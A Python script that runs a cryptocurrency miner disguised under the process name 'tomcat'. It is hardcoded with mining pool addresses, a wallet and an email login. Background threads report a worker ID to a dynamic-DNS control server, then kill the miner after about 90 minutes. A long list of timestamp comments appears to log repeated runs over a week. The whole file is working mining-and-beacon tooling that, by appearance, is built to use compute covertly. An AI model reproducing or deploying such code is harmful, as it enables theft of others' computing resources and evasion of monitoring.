import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:22:03.998532
#2018-02-17 16:57:05.123091
#2018-02-17 18:33:01.224071
#2018-02-17 20:09:01.771738
#2018-02-17 21:41:06.184982
#2018-02-17 23:11:04.221853
#2018-02-18 00:48:04.165925
#2018-02-18 02:24:05.301630
#2018-02-18 03:53:05.504848
#2018-02-18 05:26:06.246679
#2018-02-18 07:07:03.955349
#2018-02-18 08:37:03.699346
#2018-02-18 10:10:07.640852
#2018-02-18 11:42:05.606867
#2018-02-18 13:14:04.674444
#2018-02-18 14:48:07.381750
#2018-02-18 16:24:05.838676
#2018-02-18 17:55:06.257285
#2018-02-18 19:28:02.122333
#2018-02-18 20:58:06.728804
#2018-02-18 22:32:05.069534
#2018-02-19 00:09:04.378125
#2018-02-19 01:39:05.964835
#2018-02-19 03:14:05.253933
#2018-02-19 04:46:05.132114
#2018-02-19 06:19:03.397815
#2018-02-19 07:54:06.049643
#2018-02-19 09:29:06.229066
#2018-02-19 11:01:01.863151
#2018-02-19 12:33:02.186620
#2018-02-19 14:07:01.762249
#2018-02-19 15:44:08.500623
#2018-02-19 17:16:09.125896
#2018-02-19 18:47:07.737498
#2018-02-19 20:20:04.243230
#2018-02-19 21:57:05.286622
#2018-02-19 23:26:07.405254
#2018-02-20 00:59:02.003060
#2018-02-20 02:38:02.166610
#2018-02-20 04:14:07.051185
#2018-02-20 05:41:06.868644
#2018-02-20 07:15:01.607745
#2018-02-20 08:50:06.876516
#2018-02-20 10:21:09.739319
#2018-02-20 11:55:05.683671
#2018-02-20 13:32:01.377597
#2018-02-20 15:02:09.697526
#2018-02-20 16:37:06.653861
#2018-02-20 18:13:05.302465
#2018-02-20 19:51:01.401163
#2018-02-20 21:21:01.996986
#2018-02-20 22:53:04.159273
#2018-02-21 00:22:04.925584
#2018-02-21 01:59:03.589745
#2018-02-21 03:38:04.404013
#2018-02-21 05:14:01.821280
#2018-02-21 06:47:05.255195
#2018-02-21 08:19:07.037704
#2018-02-21 09:53:04.713880
#2018-02-21 11:28:05.413667
#2018-02-21 13:00:01.823454
#2018-02-21 14:34:04.938978
#2018-02-21 16:05:11.506285
#2018-02-21 17:46:01.422757
#2018-02-21 19:16:05.134095
#2018-02-21 20:50:08.020392
#2018-02-21 22:22:01.857070
#2018-02-21 23:57:06.143762
#2018-02-22 01:31:06.606900
#2018-02-22 03:04:05.720414
#2018-02-22 04:34:02.199823
#2018-02-22 06:08:01.464279
#2018-02-22 07:43:07.346141
#2018-02-22 09:17:04.823386
#2018-02-22 10:50:10.140659
#2018-02-22 12:23:04.493828
#2018-02-22 13:56:05.128546
#2018-02-22 15:32:01.968466
#2018-02-22 17:03:08.916698
#2018-02-22 18:40:08.660482
#2018-02-22 20:17:07.597467
#2018-02-22 21:48:01.839807
#2018-02-22 23:19:01.837538
#2018-02-23 00:51:06.270849
#2018-02-23 02:23:06.720218
#2018-02-23 03:54:09.385966
#2018-02-23 05:41:05.525608
#2018-02-23 07:26:07.571349
#2018-02-23 09:29:04.511210
#2018-02-23 11:36:01.686014
#2018-02-23 13:26:07.979978
#2018-02-23 15:11:09.308128
#2018-02-23 17:01:06.940506
#2018-02-23 18:49:09.421180
#2018-02-23 20:36:01.495520
#2018-02-23 22:23:02.050880
#2018-02-24 00:08:05.604039
#2018-02-24 01:59:01.630434
#2018-02-24 03:49:07.477070
#2018-02-24 05:32:04.564265
#2018-02-24 07:17:06.730888
#2018-02-24 09:07:03.534147
#2018-02-24 10:44:05.278432
#2018-02-24 12:31:05.424445
#2018-02-24 14:08:01.335986
#2018-02-24 15:38:06.092756
#2018-02-24 17:21:05.029956
#2018-02-24 18:54:07.209099
#2018-02-24 20:26:03.857547
#2018-02-24 21:55:04.038648
#2018-02-25 00:40:06.223631
#2018-02-25 02:41:04.594846
#2018-02-25 06:25:01.758971